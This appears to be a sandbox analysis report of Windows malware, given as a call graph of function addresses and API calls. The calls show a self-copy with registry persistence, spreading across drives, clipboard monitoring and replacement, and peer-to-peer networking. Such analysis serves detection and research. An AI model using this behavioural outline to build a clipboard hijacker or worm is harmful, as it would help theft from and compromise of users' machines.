5208 40b306 Sleep 5206->5208 5210 40b335 5206->5210 5209 40a3f0 _invalid_parameter 3 API calls 5207->5209 5208->5206 5209->5210 5210->5201 5231 40adc0 5210->5231 5212->4480 5214 40adc0 14 API calls 5213->5214 5215 40adb3 LeaveCriticalSection 5214->5215 5215->4473 5217 40b037 gethostbyname 5216->5217 5218 40b053 5216->5218 5217->5218 5218->5171 5219 40ac60 inet_ntoa 5218->5219 5219->5169 5220->5173 5221->5179 5222->5188 5223->5178 5224->5186 5225->5195 5226->5187 5227->5196 5228->5200 5229->5202 5230->5206 5232 40add4 5231->5232 5234 40adcf 5231->5234 5233 40a1e0 _invalid_parameter 7 API calls 5232->5233 5236 40ade8 5233->5236 5234->5201 5235 40ae44 CreateFileW 5237 40ae93 InterlockedExchange 5235->5237 5238 40ae67 WriteFile FlushFileBuffers CloseHandle 5235->5238 5236->5234 5236->5235 5239 40a3f0 _invalid_parameter 3 API calls 5237->5239 5238->5237 5239->5234 5241 40d49d 5240->5241 5242 40d3d3 5241->5242 5243 40d4c1 WaitForSingleObject 5241->5243 5242->4487 5242->4488 5243->5241 5244 40d4dc CloseHandle 5243->5244 5244->5241 5246 405829 memset GetModuleHandleW 5245->5246 5247 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5246->5247 5247->5247 5248 4058a0 CreateWindowExW 5247->5248 5249 4058cb 5248->5249 5250 4058cd GetMessageA 5248->5250 5251 4058ff ExitThread 5249->5251 5252 4058e1 TranslateMessage DispatchMessageA 5250->5252 5253 4058f7 5250->5253 5252->5250 5253->5246 5253->5251 5275 40e9b0 CreateFileW 5254->5275 5256 406b60 5257 406cb8 ExitThread 5256->5257 5259 406ca8 Sleep 5256->5259 5260 406b99 5256->5260 5278 406340 GetLogicalDrives 5256->5278 5259->5256 5284 406260 5260->5284 5263 406bd0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5265 406c46 wsprintfW 5263->5265 5266 406c5b wsprintfW 5263->5266 5264 406bcb 5265->5266 5290 406650 _chkstk 5266->5290 5273 4073d7 5268->5273 5269 4074b1 Sleep 5269->5273 5270 4073ff Sleep 5270->5273 5271 40742e Sleep wsprintfA DeleteUrlCacheEntry 5343 40ec70 InternetOpenA 5271->5343 5273->5269 5273->5270 5273->5271 5274 40ed20 64 API calls 5273->5274 5274->5273 5276 40e9f8 5275->5276 5277 40e9df GetFileSize CloseHandle 5275->5277 5276->5256 5277->5276 5283 40636d 5278->5283 5279 4063e6 5279->5256 5280 40637c RegOpenKeyExW 5281 40639e RegQueryValueExW 5280->5281 5280->5283 5282 4063da RegCloseKey 5281->5282 5281->5283 5282->5283 5283->5279 5283->5280 5283->5282 5285 4062b9 5284->5285 5286 40627c 5284->5286 5285->5263 5285->5264 5325 4062c0 GetDriveTypeW 5286->5325 5289 4062ab lstrcpyW 5289->5285 5291 40666e 6 API calls 5290->5291 5307 406667 5290->5307 5292 406722 5291->5292 5293 406764 PathFileExistsW 5291->5293 5294 40e9b0 3 API calls 5292->5294 5295 4067e0 PathFileExistsW 5293->5295 5296 406775 PathFileExistsW 5293->5296 5301 40672e 5294->5301 5299 4067f1 5295->5299 5300 406836 FindFirstFileW 5295->5300 5297 406786 CreateDirectoryW 5296->5297 5298 4067a8 PathFileExistsW 5296->5298 5297->5298 5302 406799 SetFileAttributesW 5297->5302 5298->5295 5303 4067b9 CopyFileW 5298->5303 5304 406811 5299->5304 5305 4067f9 5299->5305 5300->5307 5323 40685d 5300->5323 5301->5293 5306 406745 SetFileAttributesW DeleteFileW 5301->5306 5302->5298 5303->5295 5309 4067d1 SetFileAttributesW 5303->5309 5311 406400 3 API calls 5304->5311 5330 406400 CoInitialize CoCreateInstance 5305->5330 5306->5293 5307->5264 5308 40691f lstrcmpW 5312 406935 lstrcmpW 5308->5312 5308->5323 5309->5295 5313 40680c SetFileAttributesW 5311->5313 5312->5323 5313->5300 5314 406af6 FindNextFileW 5314->5308 5316 406b12 FindClose 5314->5316 5316->5307 5317 40697b lstrcmpiW 5317->5323 5318 4069e2 PathMatchSpecW 5319 406a03 wsprintfW SetFileAttributesW DeleteFileW 5318->5319 5318->5323 5319->5323 5320 406a60 PathFileExistsW 5321 406a76 wsprintfW wsprintfW 5320->5321 5320->5323 5322 406ae0 MoveFileExW 5321->5322 5321->5323 5322->5314 5323->5308 5323->5314 5323->5317 5323->5318 5323->5320 5334 406510 CreateDirectoryW wsprintfW FindFirstFileW 5323->5334 5326 40629f 5325->5326 5327 4062e8 5325->5327 5326->5285 5326->5289 5327->5326 5328 4062fc QueryDosDeviceW 5327->5328 5328->5326 5329 406316 StrCmpNW 5328->5329 5329->5326 5331 406436 5330->5331 5333 406472 5330->5333 5332 406440 wsprintfW 5331->5332 5331->5333 5332->5333 5333->5313 5335 406565 lstrcmpW 5334->5335 5336 40663f 5334->5336 5337 40657b lstrcmpW 5335->5337 5342 406591 5335->5342 5336->5323 5338 406593 wsprintfW wsprintfW 5337->5338 5337->5342 5341 4065f6 MoveFileExW 5338->5341 5338->5342 5339 40660c FindNextFileW 5339->5335 5340 406628 FindClose RemoveDirectoryW 5339->5340 5340->5336 5341->5339 5342->5339 5344 40ec96 InternetOpenUrlA 5343->5344 5345 40ed08 Sleep 5343->5345 5346 40ecb5 HttpQueryInfoA 5344->5346 5347 40ecfe InternetCloseHandle 5344->5347 5345->5273 5348 40ecf4 InternetCloseHandle 5346->5348 5349 40ecde 5346->5349 5347->5345 5348->5347 5349->5348 5442 40ccd0 5447 40af80 5442->5447 5445 40ccfa 5448 40b010 2 API calls 5447->5448 5449 40af8f 5448->5449 5450 40af99 5449->5450 5451 40af9d EnterCriticalSection 5449->5451 5450->5445 5454 40cd10 InterlockedExchangeAdd 5450->5454 5452 40afbc LeaveCriticalSection 5451->5452 5452->5450 5455 40cd2d 5454->5455 5465 40cd26 5454->5465 5471 40d000 5455->5471 5458 40cd4d InterlockedIncrement 5468 40cd57 5458->5468 5460 40cd80 5481 40ac60 inet_ntoa 5460->5481 5462 40cd8c 5463 40ce50 InterlockedDecrement 5462->5463 5496 40ad80 shutdown closesocket 5463->5496 5465->5445 5466 40a1e0 _invalid_parameter 7 API calls 5466->5468 5467 40cf30 6 API calls 5467->5468 5468->5460 5468->5463 5468->5466 5468->5467 5470 40a3f0 _invalid_parameter 3 API calls 5468->5470 5478 40b760 5468->5478 5482 40b7b0 5468->5482 5470->5468 5472 40d00d socket 5471->5472 5473 40d022 htons connect 5472->5473 5474 40d07f 5472->5474 5473->5474 5475 40d06a 5473->5475 5474->5472 5476 40cd3d 5474->5476 5497 40ad80 shutdown closesocket 5475->5497 5476->5458 5476->5465 5498 40b6c0 5478->5498 5481->5462 5493 40b7c1 5482->5493 5484 40b7df 5486 40a3f0 _invalid_parameter 3 API calls 5484->5486 5487 40bb8f 5486->5487 5487->5468 5488 40bba0 21 API calls 5488->5493 5491 40b760 13 API calls 5491->5493 5492 40b0c0 32 API calls 5492->5493 5493->5484 5493->5488 5493->5491 5493->5492 5506 40bcf0 5493->5506 5513 40b490 EnterCriticalSection 5493->5513 5518 406e00 5493->5518 5523 406ea0 5493->5523 5528 406cd0 5493->5528 5535 406dd0 5493->5535 5496->5465 5497->5476 5499 40c140 3 API calls 5498->5499 5500 40b6cb 5499->5500 5501 40b6e7 lstrlenA 5500->5501 5502 40c3d0 7 API calls 5501->5502 5503 40b71d 5502->5503 5504 40a3f0 _invalid_parameter 3 API calls 5503->5504 5505 40b748 5503->5505 5504->5505 5505->5468 5507 40bd01 lstrlenA 5506->5507 5508 40c3d0 7 API calls 5507->5508 5511 40bd1f 5508->5511 5509 40bd2b 5510 40a3f0 _invalid_parameter 3 API calls 5509->5510 5512 40bdaf 5509->5512 5510->5512 5511->5507 5511->5509 5512->5493 5515 40b4a8 5513->5515 5514 40b4e4 LeaveCriticalSection 5514->5493 5515->5514 5538 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5515->5538 5517 40b4d3 5517->5514 5539 406e40 5518->5539 5521 406e39 5521->5493 5522 40d3a0 17 API calls 5522->5521 5524 406e40 75 API calls 5523->5524 5525 406ebf 5524->5525 5526 406eec 5525->5526 5554 406f00 5525->5554 5526->5493 5557 405f40 EnterCriticalSection 5528->5557 5530 406d1d 5530->5493 5531 406cea 5531->5530 5562 406d30 5531->5562 5534 40a3f0 _invalid_parameter 3 API calls 5534->5530 5569 406000 EnterCriticalSection 5535->5569 5537 406df2 5537->5493 5538->5517 5542 406e53 5539->5542 5540 406e14 5540->5521 5540->5522 5542->5540 5543 405e50 EnterCriticalSection 5542->5543 5544 40ca60 71 API calls 5543->5544 5545 405e6e 5544->5545 5546 405f2b LeaveCriticalSection 5545->5546 5547 405e87 5545->5547 5550 405ea8 5545->5550 5546->5542 5548 405e91 memcpy 5547->5548 5553 405ea6 5547->5553 5548->5553 5549 40a3f0 _invalid_parameter 3 API calls 5551 405f28 5549->5551 5552 405f06 memcpy 5550->5552 5550->5553 5551->5546 5552->5553 5553->5549 5555 40b6c0 13 API calls 5554->5555 5556 406f45 5555->5556 5556->5526 5559 405f5e 5557->5559 5558 405fea LeaveCriticalSection 5558->5531 5559->5558 5560 40a460 8 API calls 5559->5560 5561 405fbc 5560->5561 5561->5558 5563 40a1e0 _invalid_parameter 7 API calls 5562->5563 5564 406d42 memcpy 5563->5564 5565 40b6c0 13 API calls 5564->5565 5566 406dac 5565->5566 5567 40a3f0 _invalid_parameter 3 API calls 5566->5567 5568 406d11 5567->5568 5568->5534 5594 40cac0 5569->5594 5572 406243 LeaveCriticalSection 5572->5537 5573 40ca60 71 API calls 5574 406039 5573->5574 5574->5572 5576 406094 memcpy 5574->5576 5593 406158 5574->5593 5575 406181 5578 40a3f0 _invalid_parameter 3 API calls 5575->5578 5579 40a3f0 _invalid_parameter 3 API calls 5576->5579 5577 405c90 73 API calls 5577->5575 5580 4061a2 5578->5580 5581 4060b8 5579->5581 5580->5572 5582 4061b1 CreateFileW 5580->5582 5583 40a460 8 API calls 5581->5583 5582->5572 5584 4061d4 5582->5584 5585 4060c8 5583->5585 5588 4061f1 WriteFile 5584->5588 5589 40622f FlushFileBuffers CloseHandle 5584->5589 5586 40a3f0 _invalid_parameter 3 API calls 5585->5586 5587 4060ef 5586->5587 5590 40c3d0 7 API calls 5587->5590 5588->5584 5589->5572 5591 406125 5590->5591 5592 407280 69 API calls 5591->5592 5592->5593 5593->5575 5593->5577 5597 40c010 5594->5597 5599 40c021 5597->5599 5598 40a460 8 API calls 5598->5599 5599->5598 5600 40bf70 70 API calls 5599->5600 5603 40c03b 5599->5603 5604 407d30 68 API calls 5599->5604 5605 40c07b memcmp 5599->5605 5600->5599 5601 40a3f0 _invalid_parameter 3 API calls 5602 406022 5601->5602 5602->5572 5602->5573 5603->5601 5604->5599 5605->5599 5605->5603 5606 401f50 GetQueuedCompletionStatus 5607 401f92 5606->5607 5608 402008 5606->5608 5609 401f97 WSAGetOverlappedResult 5607->5609 5613 401d60 5607->5613 5609->5607 5610 401fb9 WSAGetLastError 5609->5610 5610->5607 5612 401fd3 GetQueuedCompletionStatus 5612->5607 5612->5608 5614 401ef2 InterlockedDecrement setsockopt closesocket 5613->5614 5615 401d74 5613->5615 5632 401e39 5614->5632 5615->5614 5616 401d7c 5615->5616 5633 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5616->5633 5618 401d81 InterlockedExchange 5619 401d98 5618->5619 5620 401e4e 5618->5620 5625 401da9 InterlockedDecrement 5619->5625 5626 401dbc InterlockedDecrement InterlockedExchangeAdd 5619->5626 5619->5632 5621 401e67 5620->5621 5622 401e57 InterlockedDecrement 5620->5622 5623 401e72 5621->5623 5624 401e87 InterlockedDecrement 5621->5624 5622->5612 5642 401ae0 WSASend 5623->5642 5629 401ee9 5624->5629 5625->5612 5627 401e2f 5626->5627 5634 401cf0 5627->5634 5629->5612 5630 401e7e 5630->5612 5632->5612 5633->5618 5635 401d00 InterlockedExchangeAdd 5634->5635 5636 401cfc 5634->5636 5637 401d53 5635->5637 5638 401d17 InterlockedIncrement 5635->5638 5636->5632 5637->5632 5639 401c50 4 API calls 5638->5639 5640 401d46 5639->5640 5640->5637 5641 401d4c InterlockedDecrement 5640->5641 5641->5637 5643 401b50 5642->5643 5644 401b12 WSAGetLastError 5642->5644 5643->5630 5644->5643 5645 401b1f 5644->5645 5646 401b56 5645->5646 5647 401b26 Sleep WSASend 5645->5647 5646->5630 5647->5643 5647->5644 5745 405910 GetWindowLongW 5746 405934 5745->5746 5747 405956 5745->5747 5748 405941 5746->5748 5749 4059c7 IsClipboardFormatAvailable 5746->5749 5751 4059a6 5747->5751 5752 40598e SetWindowLongW 5747->5752 5759 405951 5747->5759 5754 405964 SetClipboardViewer SetWindowLongW 5748->5754 5755 405947 5748->5755 5753 4059e3 IsClipboardFormatAvailable 5749->5753 5757 4059da 5749->5757 5750 405b44 DefWindowProcA 5756 4059ac SendMessageA 5751->5756 5751->5759 5752->5759 5753->5757 5758 4059f8 IsClipboardFormatAvailable 5753->5758 5754->5750 5755->5759 5760 405afd RegisterRawInputDevices ChangeClipboardChain 5755->5760 5756->5759 5761 405a15 OpenClipboard 5757->5761 5762 405adc 5757->5762 5758->5757 5759->5750 5760->5750 5761->5762 5764 405a25 GetClipboardData 5761->5764 5762->5759 5763 405ae5 SendMessageA 5762->5763 5763->5759 5764->5759 5765 405a3d GlobalLock 5764->5765 5765->5759 5766 405a55 5765->5766 5767 405a68 5766->5767 5768 405a89 5766->5768 5769 405a9e 5767->5769 5770 405a6e 5767->5770 5771 405630 13 API calls 5768->5771 5786 405750 5769->5786 5772 405a74 GlobalUnlock CloseClipboard 5770->5772 5780 405510 5770->5780 5771->5772 5772->5762 5776 405ac7 5772->5776 5794 4048a0 lstrlenW 5776->5794 5779 40a3f0 _invalid_parameter 3 API calls 5779->5762 5781 40551b 5780->5781 5782 405521 lstrlenW 5781->5782 5783 405534 5781->5783 5784 40a1e0 _invalid_parameter 7 API calls 5781->5784 5785 405551 lstrcpynW 5781->5785 5782->5781 5782->5783 5783->5772 5784->5781 5785->5781 5785->5783 5791 40575d 5786->5791 5787 405763 lstrlenA 5787->5791 5792 405776 5787->5792 5788 4055d0 2 API calls 5788->5791 5789 40a1e0 _invalid_parameter 7 API calls 5789->5791 5791->5787 5791->5788 5791->5789 5791->5792 5793 40a3f0 _invalid_parameter 3 API calls 5791->5793 5831 405700 5791->5831 5792->5772 5793->5791 5795 4048d4 5794->5795 5804 404c69 StrStrW 5795->5804 5805 404ae2 5795->5805 5808 404af4 5795->5808 5796 404d5e StrStrW 5797 404d71 5796->5797 5798 404d75 StrStrW 5796->5798 5797->5798 5799 404d88 5798->5799 5800 404d8c StrStrW 5798->5800 5799->5800 5801 404d9f 5800->5801 5802 404e09 isalpha 5801->5802 5801->5805 5815 404e43 5801->5815 5802->5801 5803 404e20 isdigit 5802->5803 5803->5801 5803->5805 5806 404c94 StrStrW 5804->5806 5804->5808 5805->5779 5807 404cbf StrStrW 5806->5807 5806->5808 5807->5808 5808->5796 5808->5805 5809 405351 StrStrW 5813 405364 5809->5813 5814 40536b StrStrW 5809->5814 5810 405303 StrStrW 5811 405316 5810->5811 5812 40531d StrStrW 5810->5812 5811->5812 5816 405330 5812->5816 5817 405337 StrStrW 5812->5817 5813->5814 5818 405385 StrStrW 5814->5818 5819 40537e 5814->5819 5815->5809 5815->5810 5816->5817 5817->5809 5822 40534a 5817->5822 5820 405398 5818->5820 5821 40539f StrStrW 5818->5821 5819->5818 5820->5821 5823 4053b2 5821->5823 5824 4053b9 StrStrW 5821->5824 5822->5809 5823->5824 5825 4053cc lstrlenA 5824->5825 5825->5805 5827 405492 GlobalAlloc 5825->5827 5827->5805 5828 4054ad GlobalLock 5827->5828 5828->5805 5829 4054c0 memcpy GlobalUnlock OpenClipboard 5828->5829 5829->5805 5830 4054ed EmptyClipboard SetClipboardData CloseClipboard 5829->5830 5830->5805 5832 40570b 5831->5832 5833 405711 lstrlenA 5832->5833 5834 4055d0 2 API calls 5832->5834 5835 405744 5832->5835 5833->5832 5834->5832 5835->5791 5836 40d710 5837 40b7b0 192 API calls 5836->5837 5838 40d748 5837->5838 5839 40d310 5844 401b60 5839->5844 5841 40d344 5842 40d325 5842->5841 5843 401b60 16 API calls 5842->5843 5843->5841 5845 401c42 5844->5845 5846 401b70 5844->5846 5845->5842 5846->5845 5847 409fd0 7 API calls 5846->5847 5848 401b9d 5847->5848 5848->5845 5849 40a460 8 API calls 5848->5849 5850 401bc9 5849->5850 5851 401be6 5850->5851 5852 401bd6 5850->5852 5854 401ae0 4 API calls 5851->5854 5853 40a3f0 _invalid_parameter 3 API calls 5852->5853 5855 401bdc 5853->5855 5856 401bf3 5854->5856 5855->5842 5857 401c33 5856->5857 5858 401bfc EnterCriticalSection 5856->5858 5859 40a3f0 _invalid_parameter 3 API calls 5857->5859 5860 401c13 5858->5860 5861 401c1f LeaveCriticalSection 5858->5861 5862 401c3c 5859->5862 5860->5861 5861->5842 5863 40a3f0 _invalid_parameter 3 API calls 5862->5863 5863->5845 5864 40d790 5874 4013b0 5864->5874 5866 40d79d 5867 40b440 5 API calls 5866->5867 5868 40d7b7 InterlockedExchangeAdd 5866->5868 5869 40d7fb WaitForSingleObject 5866->5869 5871 40b760 13 API calls 5866->5871 5873 40d81d 5866->5873 5867->5866 5868->5866 5868->5869 5869->5866 5870 40d814 5869->5870 5886 401330 5870->5886 5871->5866 5875 409fd0 7 API calls 5874->5875 5876 4013bb CreateEventA socket 5875->5876 5877 4013f2 5876->5877 5878 4013f8 5876->5878 5879 401330 8 API calls 5877->5879 5880 401401 bind 5878->5880 5881 401462 5878->5881 5879->5878 5882 401444 CreateThread 5880->5882 5883 401434 5880->5883 5881->5866 5882->5881 5896 401100 5882->5896 5884 401330 8 API calls 5883->5884 5885 40143a 5884->5885 5885->5866 5887 401339 5886->5887 5894 40139b 5886->5894 5888 401341 SetEvent WaitForSingleObject CloseHandle 5887->5888 5887->5894 5890 401369 5888->5890 5895 40138b 5888->5895 5892 40a3f0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5890->5892 5890->5895 5891 401395 5893 40a3f0 _invalid_parameter 3 API calls 5891->5893 5892->5890 5893->5894 5894->5873 5925 40ad80 shutdown closesocket 5895->5925 5897 401115 ioctlsocket 5896->5897 5898 4011e4 5897->5898 5900 40113a 5897->5900 5899 40a3f0 _invalid_parameter 3 API calls 5898->5899 5902 4011ea 5899->5902 5901 4011cd WaitForSingleObject 5900->5901 5903 40a220 9 API calls 5900->5903 5904 401168 recvfrom 5900->5904 5905 4011ad InterlockedExchangeAdd 5900->5905 5901->5897 5901->5898 5903->5900 5904->5900 5904->5901 5907 401000 5905->5907 5909 401014 5907->5909 5908 40103b 5918 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5908->5918 5909->5908 5910 409fd0 7 API calls 5909->5910 5910->5908 5912 40105b 5919 401580 5912->5919 5914 4010ec 5914->5900 5915 4010a3 IsBadReadPtr 5917 401071 5915->5917 5916 4010d8 memmove 5916->5917 5917->5914 5917->5915 5917->5916 5918->5912 5920 401592 5919->5920 5921 4015a5 memcpy 5919->5921 5922 40a220 9 API calls 5920->5922 5923 4015c1 5921->5923 5924 40159f 5922->5924 5923->5917 5924->5921 5925->5891 5926 40d190 5927 40d1a6 5926->5927 5941 40d1fe 5926->5941 5928 40d1b0 5927->5928 5929 40d203 5927->5929 5930 40d253 5927->5930 5927->5941 5933 409fd0 7 API calls 5928->5933 5931 40d228 5929->5931 5932 40d21b InterlockedDecrement 5929->5932 5953 40be00 5930->5953 5935 40a3f0 _invalid_parameter 3 API calls 5931->5935 5932->5931 5936 40d1bd 5933->5936 5937 40d234 5935->5937 5949 4023d0 5936->5949 5939 40a3f0 _invalid_parameter 3 API calls 5937->5939 5939->5941 5942 40af80 4 API calls 5943 40d1df 5942->5943 5943->5941 5944 40d1eb InterlockedIncrement 5943->5944 5944->5941 5945 40d2b1 IsBadReadPtr 5947 40d279 5945->5947 5947->5941 5947->5945 5948 40b7b0 192 API calls 5947->5948 5958 40bf00 5947->5958 5948->5947 5950 402413 5949->5950 5951 4023d9 5949->5951 5950->5942 5951->5950 5952 4023ea InterlockedIncrement 5951->5952 5952->5950 5954 40be13 5953->5954 5955 40be3d memcpy 5953->5955 5956 40a220 9 API calls 5954->5956 5955->5947 5957 40be34 5956->5957 5957->5955 5959 40bf29 5958->5959 5960 40bf1e 5958->5960 5959->5960 5961 40bf41 memmove 5959->5961 5960->5947 5961->5960 5648 40f0dc 5649 40f0e4 5648->5649 5650 40f198 5649->5650 5654 40f319 5649->5654 5653 40f11d 5653->5650 5658 40f204 RtlUnwind 5653->5658 5655 40f32e 5654->5655 5657 40f34a 5654->5657 5656 40f3b9 NtQueryVirtualMemory 5655->5656 5655->5657 5656->5657 5657->5653 5659 40f21c 5658->5659 5659->5653 5962 405f1d 5964 405eb1 5962->5964 5963 40a3f0 _invalid_parameter 3 API calls 5965 405f28 LeaveCriticalSection 5963->5965 5966 405f06 memcpy 5964->5966 5967 405f1b 5964->5967 5966->5967 5967->5963 5660 40b660 5661 40b663 WaitForSingleObject 5660->5661 5662 40b691 5661->5662 5663 40b67b InterlockedDecrement 5661->5663 5664 40b68a 5663->5664 5664->5661 5665 40ada0 16 API calls 5664->5665 5665->5664 5666 40d760 5669 401200 5666->5669 5668 40d782 5670 401314 5669->5670 5671 40121d 5669->5671 5670->5668 5671->5670 5672 40a1e0 _invalid_parameter 7 API calls 5671->5672 5673 401247 memcpy htons 5672->5673 5674 4012ed 5673->5674 5675 401297 sendto 5673->5675 5678 40a3f0 _invalid_parameter 3 API calls 5674->5678 5676 4012b6 InterlockedExchangeAdd 5675->5676 5677 4012e9 5675->5677 5676->5675 5679 4012cc 5676->5679 5677->5674 5680 40130a 5677->5680 5681 4012fc 5678->5681 5682 40a3f0 _invalid_parameter 3 API calls 5679->5682 5683 40a3f0 _invalid_parameter 3 API calls 5680->5683 5681->5668 5684 4012db 5682->5684 5683->5670 5684->5668 5969 401920 GetTickCount WaitForSingleObject 5970 401ac9 5969->5970 5971 40194d WSAWaitForMultipleEvents 5969->5971 5972 4019f0 GetTickCount 5971->5972 5973 40196a WSAEnumNetworkEvents 5971->5973 5974 401a43 GetTickCount 5972->5974 5975 401a05 EnterCriticalSection 5972->5975 5973->5972 5988 401983 5973->5988 5976 401ab5 WaitForSingleObject 5974->5976 5977 401a4e EnterCriticalSection 5974->5977 5978 401a16 5975->5978 5979 401a3a LeaveCriticalSection 5975->5979 5976->5970 5976->5971 5980 401aa1 LeaveCriticalSection GetTickCount 5977->5980 5981 401a5f InterlockedExchangeAdd 5977->5981 5984 401a29 LeaveCriticalSection 5978->5984 6011 401820 5978->6011 5979->5976 5980->5976 6029 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5981->6029 5982 401992 accept 5982->5972 5982->5988 5984->5976 5987 401a72 5987->5980 5987->5981 6030 40ad80 shutdown closesocket 5987->6030 5988->5972 5988->5982 5990 401cf0 7 API calls 5988->5990 5991 4022c0 5988->5991 5990->5972 5992 4022d2 EnterCriticalSection 5991->5992 5993 4022cd 5991->5993 5994 4022e7 5992->5994 5995 4022fd LeaveCriticalSection 5992->5995 5993->5988 5994->5995 5996 402308 5995->5996 5997 40230f 5995->5997 5996->5988 5998 409fd0 7 API calls 5997->5998 5999 402319 5998->5999 6000 402326 getpeername CreateIoCompletionPort 5999->6000 6001 4023b8 5999->6001 6002 4023b2 6000->6002 6003 402366 6000->6003 6033 40ad80 shutdown closesocket 6001->6033 6006 40a3f0 _invalid_parameter 3 API calls 6002->6006 6031 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 6003->6031 6006->6001 6007 4023c3 6007->5988 6008 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6032 4021e0 EnterCriticalSection LeaveCriticalSection 6008->6032 6010 4023ab 6010->5988 6012 40190f 6011->6012 6013 401830 6011->6013 6012->5979 6013->6012 6014 40183d InterlockedExchangeAdd 6013->6014 6014->6012 6020 401854 6014->6020 6015 401880 6016 401891 6015->6016 6043 40ad80 shutdown closesocket 6015->6043 6019 4018a7 InterlockedDecrement 6016->6019 6021 401901 6016->6021 6019->6021 6020->6012 6020->6015 6034 4017a0 EnterCriticalSection 6020->6034 6022 402247 6021->6022 6023 402265 EnterCriticalSection 6021->6023 6022->5979 6024 40229c LeaveCriticalSection DeleteCriticalSection 6023->6024 6027 40227d 6023->6027 6025 40a3f0 _invalid_parameter 3 API calls 6024->6025 6025->6022 6026 40a3f0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6026->6027 6027->6026 6028 40229b 6027->6028 6028->6024 6029->5987 6030->5987 6031->6008 6032->6010 6033->6007 6035 401807 LeaveCriticalSection 6034->6035 6036 4017ba InterlockedExchangeAdd 6034->6036 6035->6020 6037 4017ca LeaveCriticalSection 6036->6037 6038 4017d9 6036->6038 6037->6020 6039 40a3f0 _invalid_parameter 3 API calls 6038->6039 6040 4017fe 6039->6040 6041 40a3f0 _invalid_parameter 3 API calls 6040->6041 6042 401804 6041->6042 6042->6035 6043->6016 5685 40e361 5687 40e36a 5685->5687 5686 40e45d 5687->5686 5688 40e3d3 lstrcmpiW 5687->5688 5689 40e453 SysFreeString 5688->5689 5690 40e3e6 5688->5690 5689->5686 5691 40e150 2 API calls 5690->5691 5693 40e3f4 5691->5693 5692 40e445 5692->5689 5693->5689 5693->5692 5694 40e423 lstrcmpiW 5693->5694 5695 40e435 5694->5695 5696 40e43b SysFreeString 5694->5696 5695->5696 5696->5692 5697 40f0e4 5698 40f102 5697->5698 5700 40f198 5697->5700 5699 40f319 NtQueryVirtualMemory 5698->5699 5702 40f11d 5699->5702 5701 40f204 RtlUnwind 5701->5702 5702->5700 5702->5701 5703 405fe5 5705 405f5e 5703->5705 5704 405fea LeaveCriticalSection 5705->5704 5706 40a460 8 API calls 5705->5706 5707 405fbc 5706->5707 5707->5704 6044 4069a5 6047 40694b 6044->6047 6045 40697b lstrcmpiW 6045->6047 6046 406af6 FindNextFileW 6048 406b12 FindClose 6046->6048 6049 40691f lstrcmpW 6046->6049 6047->6045 6047->6046 6050 4069e2 PathMatchSpecW 6047->6050 6053 406a60 PathFileExistsW 6047->6053 6057 406510 11 API calls 6047->6057 6054 406b1f 6048->6054 6049->6047 6052 406935 lstrcmpW 6049->6052 6050->6047 6051 406a03 wsprintfW SetFileAttributesW DeleteFileW 6050->6051 6051->6047 6052->6047 6053->6047 6055 406a76 wsprintfW wsprintfW 6053->6055 6055->6047 6056 406ae0 MoveFileExW 6055->6056 6056->6046 6057->6047 5708 40ce70 5713 40ced0 5708->5713 5710 40ce9e 5712 40ced0 send 5712->5710 5714 40cee1 send 5713->5714 5715 40ce83 5714->5715 5716 40cefe 5714->5716 5715->5710 5715->5712 5716->5714 5716->5715 5717 40d0f0 5722 40d0f4 5717->5722 5719 40d110 WaitForSingleObject 5721 40d135 5719->5721 5719->5722 5720 40cd10 206 API calls 5720->5722 5722->5719 5722->5720 5722->5721 5723 40b440 EnterCriticalSection 5722->5723 5724 40b477 LeaveCriticalSection 5723->5724 5725 40b45f 5723->5725 5724->5722 5726 40c100 3 API calls 5725->5726 5727 40b46a 5726->5727 5727->5724 6058 40d830 6064 401470 6058->6064 6060 40d844 6061 40d86f 6060->6061 6062 40d855 WaitForSingleObject 6060->6062 6063 401330 8 API calls 6062->6063 6063->6061 6065 401483 6064->6065 6066 401572 6064->6066 6065->6066 6067 409fd0 7 API calls 6065->6067 6066->6060 6068 401498 CreateEventA socket 6067->6068 6069 4014d5 6068->6069 6070 4014cf 6068->6070 6069->6066 6071 4014e2 htons setsockopt bind 6069->6071 6072 401330 8 API calls 6070->6072 6073 401546 6071->6073 6074 401558 CreateThread 6071->6074 6072->6069 6075 401330 8 API calls 6073->6075 6074->6066 6077 401100 20 API calls _invalid_parameter 6074->6077 6076 40154c 6075->6076 6076->6060

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 4074d0-407504 Sleep CreateMutexA GetLastError 1 407506-407508 ExitProcess 0->1 2 40750e-4075ad GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075b3-4075be call 40e970 2->3 4 40773a-407765 Sleep RegOpenKeyExW 2->4 14 4075c0-4075c2 ExitProcess 3->14 15 4075c8-407616 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407793-4077b3 RegOpenKeyExW 4->5 6 407767-40778d RegSetValueExA RegCloseKey 4->6 8 4077b5-4077e1 RegSetValueExA RegCloseKey 5->8 9 4077e6-407806 RegOpenKeyExW 5->9 6->5 11 4078e2-407902 RegOpenKeyExW 8->11 12 407808-407837 RegCreateKeyExW RegCloseKey 9->12 13 40783d-40785d RegOpenKeyExW 9->13 16 407930-407950 RegOpenKeyExW 11->16 17 407904-40792a RegSetValueExA RegCloseKey 11->17 12->13 20 407894-4078b4 RegOpenKeyExW 13->20 21 40785f-40788e RegCreateKeyExW RegCloseKey 13->21 18 407687-4076c9 Sleep wsprintfW CopyFileW 15->18 19 407618-407647 SetFileAttributesW RegOpenKeyExW 15->19 23 407952-407978 RegSetValueExA RegCloseKey 16->23 24 40797e-40799e RegOpenKeyExA 16->24 17->16 18->4 25 4076cb-4076fa SetFileAttributesW RegOpenKeyExW 18->25 19->18 22 407649-407681 wcslen RegSetValueExW RegCloseKey 19->22 20->11 26 4078b6-4078dc RegSetValueExA RegCloseKey 20->26 21->20 22->18 23->24 27 4079a4-407a84 RegSetValueExA * 7 RegCloseKey 24->27 28 407a8a-407aaa RegOpenKeyExA 24->28 